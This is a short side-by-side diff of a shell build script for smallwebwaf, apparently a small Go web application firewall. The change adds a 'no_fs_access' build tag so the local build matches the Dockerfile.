# working on the code by hand. The version it reports comes from git, as # working on the code by hand. The version it reports comes from git, as
# in script/docker. # in script/docker, and the no_fs_access tag is the Dockerfile's.
set -eu set -eu
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd -P)" SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd -P)"
@@ -11,7 +11,7 @@ main() {
cd "$ROOT" cd "$ROOT"
version="$(git describe --tags --always --dirty 2>/dev/null || true)" version="$(git describe --tags --always --dirty 2>/dev/null || true)"
[ -n "$version" ] || version="unknown" [ -n "$version" ] || version="unknown"
go build -trimpath -ldflags "-X main.Version=$version" \ go build -tags no_fs_access -trimpath -ldflags "-X main.Version=$version" \
-o bin/smallwebwaf ./cmd/smallwebwaf -o bin/smallwebwaf ./cmd/smallwebwaf
} }